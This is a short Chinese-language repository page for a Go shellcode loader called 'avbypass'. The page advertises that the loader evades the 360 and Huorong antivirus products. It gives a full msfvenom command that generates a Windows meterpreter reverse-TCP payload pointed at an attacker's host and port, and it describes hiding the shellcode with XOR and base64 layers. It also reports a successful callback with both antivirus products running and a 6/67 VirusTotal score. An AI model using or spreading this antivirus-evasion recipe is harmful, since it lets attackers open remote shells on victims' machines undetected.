简单go加载器实现免杀360 火绒

Related tags

avbypass
Overview

avbypass

使用

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxx -f raw -o payload.bin

使用程序生成加密的shellcode后,填入指定位置,编译执行即可。

通过xor和base64多层加密shellcode实现的go加载器bypassav,

实测在开启360和火绒的情况下msf正常上线

virustotal结果 6/67,后续有时间会慢慢修改

# avbypass

avbypass

"# avbypass"

Issues
Owner
Shu1L
Shu1L